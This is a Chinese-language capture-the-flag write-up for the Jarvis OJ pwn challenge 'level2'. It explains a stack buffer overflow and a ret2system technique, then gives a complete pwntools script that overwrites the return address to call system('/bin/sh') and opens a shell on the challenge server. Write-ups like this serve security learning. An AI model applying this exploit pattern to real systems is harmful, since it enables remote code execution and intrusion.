(Jarvis Oj)(Pwn) level2

(Jarvis Oj)(Pwn) level2

首先用checksec查一下保护。这次NX开启了。
这里写图片描述
用ida反汇编,找到溢出点。
(Jarvis Oj)(Pwn) level2_第1张图片
这次system函数又出现了。于是想着是否可以通过控制调用system(“/bin/sh”)得到shell,将返回地址用system的地址覆盖,将传入参数设置成”/bin/sh”,用ida查找了一下字符串,刚好发现了”/bin/sh”,于是记录下地址(或者使用pwntools的elf工具)。
这里写图片描述
整个逻辑的示意图如下:
(Jarvis Oj)(Pwn) level2_第2张图片
注意不能在vulnerable函数的返回地址后面直接跟参数,我们需要模拟call system函数的过程,在这个过程中call有一步是将下一条指令的地址压栈,所以我们需要构造一个假的返回地址,当然这个内容随意。写得脚本如下。

  1 from pwn import *
  2 conn=remote("pwn2.jarvisoj.com","9878")
  3 e=ELF("./level2")
  4 sys_addr=e.symbols['system']
  5 pad=0x88
  6 sh_addr=e.search("/bin/sh").next()
  7 payload="A"*pad+"BBBB"+p32(sys_addr)+"dead"+p32(sh_addr    )
  8 conn.sendline(payload)
  9 conn.interactive(); 

你可能感兴趣的:(pwn)